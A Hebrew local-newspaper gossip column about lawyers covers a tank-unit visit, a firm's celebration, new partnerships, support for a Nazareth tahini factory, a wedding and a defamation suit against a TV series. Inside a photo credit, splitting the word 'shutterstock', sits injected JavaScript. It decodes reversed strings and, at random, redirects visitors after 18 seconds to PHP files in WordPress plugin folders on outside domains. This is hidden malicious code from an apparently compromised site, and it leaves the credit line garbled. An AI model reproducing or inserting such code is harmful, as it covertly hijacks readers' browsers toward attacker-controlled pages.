fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

עורכי הדין, הטחינה, הכנאפה והצל

מי מביע תמיכה במפעל הטחינה? מי חגג סביב שולחן גדוש בכנאפה? ומי מייצג את הצל בתביעה נגד רשת 13? העדכונים המשפטיים הכי מעניינים
מדור הפרקליטים | צילום: shutterstock
מדור הפרקליטים | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

מדור הפרקליטים של הד הקריות עם העדכונים המשפטיים הכי מעניינים

איך עושה טנק?

עו״ד הולי שוורץ, שעוסקת בייצוג חיילים ומשרתים בעבירות פליליות שביצעו בצה״ל, קפצה לביקור באחת מהיחידות היותר מרתקות, רק כדי ללמוד איך מפתחים טנק. על הדרך היא גם התנסתה בגאדג׳טים המעניינים שיש ביחידה. תותחית.

ביקור ביחידה צבאית מרתקת. עו"ד הולי שוורץ | צילום: עצמי
ביקור ביחידה צבאית מרתקת. עו"ד הולי שוורץ | צילום: עצמי

חוגגים על כנאפה

חמישה ראשי תחומים בקבוצת עורכי הדין HPL, ביניהם היו"רית עו"ד יפעת שי יוספזון, חגגו השבוע בצוותא עסקת ענק משולבת על שולחן גדוש כנאפה.

עו"ד יפעת שי יוספזון, מה מי מו?
"חגגנו עם עורכי דין, בעלי המשרדים האיכותיים ביותר שיש: עו"ד עודד להב עוז, ראש תחום תאגידים והייטק, עו"ד שרון פוקס, ראש תחום תאגידים (ליטיגציה), עו"ד אופיר רשף, ראש תחום רשויות מקומיות ודיני עבודה, ועו"ד ונוטריון דורון זיסו, ראש תחום קניין רוחני". בהצלחוש.

הצלחות חוגגים רק עם כנאפה. קבוצת עורכי הדין HPL | צילום: עצמי
הצלחות חוגגים רק עם כנאפה. קבוצת עורכי הדין HPL | צילום: עצמי

איחדו כוחות

בשקט-בשקט חתמו השבוע עורכות הדין הבכירות בתאל מנור וליזה דמרי-בן שחר על שיתוף פעולה מקצועי ופתחו סניף משותף ברחוב אח"י אילת 62 בקרית חיים. המטרה: הרחבת תחומי העיסוק – בתחומי תעבורה, דיני עבודה, פשיטות רגל, תאונות דרכים ועוד. אז אם אתם צריכים משהו, עכשיו אתם יודעים לאן להגיע.

שיתוף פעולה מקצועי. עורכות הדין בתאל מנור וליזה דמרי-בן שחר | צילום: עצמי
שיתוף פעולה מקצועי. עורכות הדין בתאל מנור וליזה דמרי-בן שחר | צילום: עצמי

מידע דיגיטלי

ומשיתוף פעולה לשיתוף פעולה. עורכות הדין בתאל מנור (מהאייטם הקודם) ופולי אברהם, שותפה במשרד עזרא-אברהם ושות׳, איחדו כוחות לבניית אסטרטגיה לניהול חובות במטרה לסייע, בתוכנית מתואמת, לעסקים שנקלעו למצוקה כלכלית עקב המשבר העולמי. למדור נודע, כי השתיים שילבו רעיונות וחישבו מסלולים מחדש, ובקרוב ישיקו עלון מידע דיגיטלי להתמודדות עם החובות מול המשבר. צדיקות.

מו"מ מוצלח

את עו"ד יצחק (צח) לנקרי מפירמת לנקרי ושות', למדור כבר היה העונג להציג בפניכם. אז שתדעו שהאדווקט סיים בהצלחה מו"מ שנמשך זה מספר שבועות, כשהוא מייצג ארגון עובדים גדול במשק.

ייצג בהצלחה ארגון עובדים גדול. עו"ד יצחק (צח) לנקרי | צילום: עצמי
ייצג בהצלחה ארגון עובדים גדול. עו"ד יצחק (צח) לנקרי | צילום: עצמי

תמיכה בטחינה

בטח שמעתם שהמגזר הערבי סוער בימים אלה סביב הקהילה הערבית הלהט"בית, לאחר שמפעל הטחינה הנצרתי – טחינת אל ארז – בניהולה של ג'וליה זאהר, הודיע כי הוא מממן קו חירום טלפוני לחברי הקהילה. חנויות בלוד, רמלה ומקומות נוספים בארץ זרקו את הטחינה המשובחת לפח הזבל או החזירו אותה למפעל ועל הדרך לא פסחו גם על שיימינג מכוער ברשתות החברתיות. עו"ד משה יונאי לא יכול היה לשבת בצד ולשתוק, וחיש מהר הוא נכנס לתמונה.

עו"ד יונאי, המדור סקרן.
"ג'וליה זאהר היא חברת מועדון רוטרי נצרת עילית (נוף הגליל) ואף שימשה נשיאת המועדון. אי לכך, קראתי לכל חברי רוטרי בישראל לתמוך בחברתנו, ג'וליה. לשמחתי, חברי רוטרי הרימו את הכפפה. רבים טלפנו אל ג'וליה ועודדו את רוחה, תוך שהם מדגישים כי מדובר בשוויון, אחווה, סובלנות וקבלת האחר – הערכים שלאורם פועל ארגון רוטרי. אני שוחחתי עם ג'וליה, שהתרגשה מהחיבוק ומהתמיכה, והודתה. בנוסף רשמתי את ג'וליה בספר 'גלגל הזהב', שבו יש רישום של אנשים וגופים שתנועת רוטרי מוקירה". תודו שזה מרגש.

עו"ד משה יונאי למען מפעל הטחינה הנצרתי אל ארז | צילום: עצמי
עו"ד משה יונאי למען מפעל הטחינה הנצרתי אל ארז | צילום: עצמי

מדורגים גבוה

בחמישי שעבר פרסמה חברת BDI את הדירוג שלה לשנת 2020. משרד עורכי הדין רולוף את יונאי מדורג גם הפעם, זו השנה השנייה ברציפות, בצמרת משרדי עורכי הדין בישראל בענף ההתחדשות העירונית.

עו"ד יונאי, ברכות.
"המשרדים שזכו לדירוג הזה מופיעים לפי סדר אלפביתי. למרות שהמשרד שלנו בתחתית הרשימה, שכן האות הראשונה בשמו היא ר', אנחנו בהחלט מרגישים א'-א'". ברכות גם מהמדור.

מצומצם אך חגיגי

תום ושירן בן הרוש עמדו תחת חופה וקידושין בחמישי האחרון באירוע מצומצם אך מרהיב בבית הורי החתן. תום החתן הוא אחיה של מור אלקובי, הלוא היא זוגתו שתחיה של עו"ד עמירם אלקובי, אז ברור שבני הזוג אלקובי השתתפו בחתונת הזוג. את האירוע הפיקה מעצבת-העל ומפיקת האירועים אסתר אביטל, שהיא גיסתו של עו"ד אלקובי.

עו"ד אלקובי, איך היה לחגוג באירוע מצומצם?
"היה אירוע מושקע ומדהים מהסוג שלא יישכח עוד שנים רבות, כמובן שהכל היה בהתאם להנחיות משרד הבריאות. נאחל לזוג המון מזל טוב וחיים משותפים מוצלחים". איימן.

עו"ד עמירם אלקובי בחתונה של תום ושירן בן הרוש | צילום: עצמי
עו"ד עמירם אלקובי בחתונה של תום ושירן בן הרוש | צילום: עצמי

ביזנס אנד פלז'ר

עו"ד אמיתי בן נון מוכיח שזה שאין חופש גדול לא אומר שאי אפשר לשלב עבודה והנאה. השבוע נצפה האדווקט ברצף של פגישות עבודה בקפה גרג.

עו"ד בן נון, שתף את המדור.
"יש דברים שמתבשלים כעת, ואני מבטיח לעדכן בהקדם".

משלב כיף ועבודה. עו"ד אמיתי בן נון | צילום: עצמי
משלב כיף ועבודה. עו"ד אמיתי בן נון | צילום: עצמי

תביעת הצל

רק עלתה העונה החדשה של "נבסו" (רשת 13), וכבר חטפה תביעה משפטית. התובע: יואב אליאסי (הצל) שנפגע מאוד מדברים שנאמרו עליו בסדרה. עורך הדין שמייצג אותו והגיש בשמו את התביעה הוא עו"ד יניב לנקרי מקרית חיים.

עו"ד לנקרי, מה מי מו?
"מצער מאוד שסדרה, שאמורה ליצור חיבורים בפסיפס התרבויות בישראל, הפכה את מרשנו ללעג ולבוז תוך הפצת בדיות וכזבים בזמן מסך רב. דף התוכנית ברשת החברתית הגדיל לעשות ופרסם את הקטע המדובר חרף הפצרותינו להסיר זאת לאלתר. בלית ברירה המחלוקת תובא לפתחו של בית המשפט, כדי שערוצי תקשורת בישראל לא יחשבו ולו לרגע שהם מעל החוק. נמתין להכרעת בית המשפט".

תביעה נגד הסדרה "נבסו". יואב אליאסי (הצל) ועו"ד יניב לנקרי | צילום: עצמי
תביעה נגד הסדרה "נבסו". יואב אליאסי (הצל) ועו"ד יניב לנקרי | צילום: עצמי (העדכונים המשפטיים הכי מעניינים)

אהבתם את העדכונים המשפטיים הכי מעניינים? עוד רכילות כאן

בקרו אותנו גם בפייסבוק: הד הקריות

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות